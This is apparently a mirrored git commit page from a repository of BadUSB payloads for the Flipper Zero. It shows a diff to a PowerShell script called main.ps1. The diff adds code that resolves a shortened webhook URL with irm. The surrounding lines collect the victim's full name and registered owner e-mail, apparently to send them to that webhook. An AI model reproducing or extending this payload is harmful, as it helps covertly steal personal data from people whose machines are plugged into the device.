mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2026-01-05 01:07:15 -08:00
Update main.ps1
This commit is contained in:
@@ -1,4 +1,6 @@
|
||||
$hookurl = "$dc"
|
||||
# shortened URL Detection
|
||||
if ($hookurl.Ln -ne 121){Write-Host "Shortened Webhook URL Detected.." ; $hookurl = (irm $hookurl).url}
|
||||
|
||||
$userInfo = Get-WmiObject -Class Win32_UserAccount ;$fullName = $($userInfo.FullName) ;$fullName = ("$fullName").TrimStart("")
|
||||
$email = (Get-ComputerInfo).WindowsRegisteredOwner
|
||||
|
||||
Reference in New Issue
Block a user